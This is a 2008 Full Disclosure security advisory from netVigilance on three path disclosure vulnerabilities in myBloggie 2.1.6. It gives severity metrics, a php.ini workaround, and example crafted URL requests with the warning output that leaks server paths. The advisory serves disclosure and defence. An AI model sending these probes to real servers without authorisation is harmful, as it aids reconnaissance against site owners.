Full Disclosure mailing list archives
myBloggie version 2.1.6 Multiple Path Disclosure Vulnerabilities
From: securityresearch <securityresearch () netvigilance com>
Date: Mon, 30 Jun 2008 16:14:49 -0400
*netVigilance Security Advisory #39* *myBloggie version 2.1.6 Multiple Path Disclosure Vulnerabilities* *Description:* myBloggie <http://mywebland.com/download.php?id=19> is considered one of the most simple, user-friendliest yet packed with features Weblog system available to date. Built using PHP & mySQL, web most popular scripting language & database system enable myBloggie to be installed in any webservers. Security problems in the product allow attackers to gather the true path of the server-side script. *External References:* Mitre CVE: CVE-2007-3650 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3650> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3650 NVD NIST: CVE-2007-3650 <http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3650> http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3650 *Summary:* myBloggie <http://mywebland.com/mybloggie/> (http://mywebland.com/mybloggie/) is weblog system built using PHP & mySQL, web’s most popular scripting language & database system which enable myBloggie to be installed in any web server. *Advisory URL:* http://www.netvigilance.com/advisory0039 * Release Date:* June 30^th 2008 *Severity/Risk:* Medium * * *CVSS 2.0 Metrics* *Access Vector:* Network *Access Complexity: *Low *Authentication:* None *Confidentiality Impact: *Partial *Integrity Impact: *None *Availability Impact:* None *CVSS Base Score: *5.0 * * *Target Distribution on Internet: *Low * * *Exploitability: *Functional* *Exploit *Remediation Level**: *Workaround *Report Confidence: *Uncorroborated * * *SecureScout Testcase ID:* TC 17970 *Vulnerable Systems:* myBloggie <http://mywebland.com/mybloggie/> version 2.1.6 *Vulnerability Type:* Program flaws – The product scripts have flaws which lead to Warnings or even Fatal Errors. *Vendor:* myWebland <http://mywebland.com/> (http://mywebland.com/) *Vendor Status:* The Vendor has been notified April 9^th 2007, but did not respond. *Workaround:* Disable warning messages: modify in the php.ini file following line: display_errors = Off. *Example:* * Path Disclosure Vulnerability 1:* |REQUEST: (PHP <5.0.0 and Windows Hosting are required) |http://[TARGET]/[PRODUCT DIRECTORY]/index.php?month_no=2&year=10000 |REPLY: ... <b>Warning</b>: mktime(): Windows does not support negative values for this function in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php</b> on line <b>28</b><br /> <b>Warning</b>: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php</b> on line <b>28</b><br /> ... <b>Warning</b>: mktime(): Windows does not support negative values for this function in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php</b> on line <b>44</b><br /> <b>Warning</b>: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php</b> on line <b>44</b><br /> ...| * Path Disclosure Vulnerability 2:* |REQUEST: |http://[TARGET]/[PRODUCT DIRECTORY]/common.php |REPLY: ... <b>Warning</b>: preg_replace(): Empty regular expression in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\common.php</b> on line <b>79</b><br /> ...| * Path Disclosure Vulnerability 3* |REQUEST: |http://[TARGET]/[PRODUCT DIRECTORY]/login.php?mode[]=login |REPLY: ... <b>Warning</b>: htmlspecialchars() expects parameter 1 to be string, array given in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\login.php</b> on line <b>39</b><br /> ...| *Credits:* Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com <http://www.netvigilance.com> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- myBloggie version 2.1.6 Multiple Path Disclosure Vulnerabilities securityresearch (Jun 30)